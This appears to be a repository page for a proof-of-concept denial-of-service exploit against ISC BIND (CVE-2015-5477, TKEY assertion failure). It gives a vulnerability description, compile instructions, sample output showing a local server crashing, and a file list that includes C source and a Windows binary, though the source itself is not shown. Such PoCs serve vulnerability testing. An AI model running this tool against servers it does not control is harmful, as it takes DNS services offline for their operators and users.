
CVE-2015-5477 PoC — ISC BIND Denial of Service Vulnerability

Source
Associated Vulnerability
Title: ISC BIND Denial of Service Vulnerability (CVE-2015-5477)
Description: ISC BIND is an open-source implementation of the DNS protocol maintained by the Internet Systems Consortium (ISC) in the United States. A security vulnerability exists in named in ISC BIND 9.9.7-P1 and earlier and in 9.10.2-P2 and earlier. A remote attacker can exploit it via a TKEY query to cause a denial of service (REQUIRE assertion failure and daemon exit).
Description
PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure
Readme
# PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

This program tests whether a BIND9 server is vulnerable by sending
the exploit packet and checking whether the server crashes.

It's C code that you compile the normal way on Unix/Windows, such as:

	# gcc tkill.c -o tkill

It'll run over both IPv4 and IPv6.

This is what it looks like running against `localhost`. Since resolving
the name yields two IP addresses, it tries both of them.
It first queries the "version" string, then sends the exploit.
When it probes the second address, the version query fails because
the service has already crashed from the first attempt.

	root@kali:~/cve-2015-5477# ./a.out localhost
	--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
	[+] localhost: Resolving to IP address
	[+] localhost: Resolved to multiple IPs (NOTE)
	[+] ::1: Probing...
	[+] Querying version...
	[+] ::1: "9.11.0pre-alpha"
	[+] Sending DoS packet...
	[+] Waiting 5-sec for response...
	[+] timed out, probably crashed

	[+] 127.0.0.1: Probing...
	[+] Querying version...
	[-] timed out getting version, trying again
	[-] timed out getting version, trying again
	[-] timed out getting version, trying again
	[-] Can't query server, is it crashed already?
	[-] Sending exploit anyway.
	[+] Sending DoS packet...
	[+] Waiting 5-sec for response...
	[+] timed out, probably crashed

File Snapshot

	[4.0K] /data/pocs/582eacfe39ed9715680c70a703aa3ee384a2424e
	├── [4.0K] bin
	│   └── [ 10K] win32-tkill.exe
	├── [1.3K] README.md
	└── [ 13K] tkill.c

	1 directory, 3 files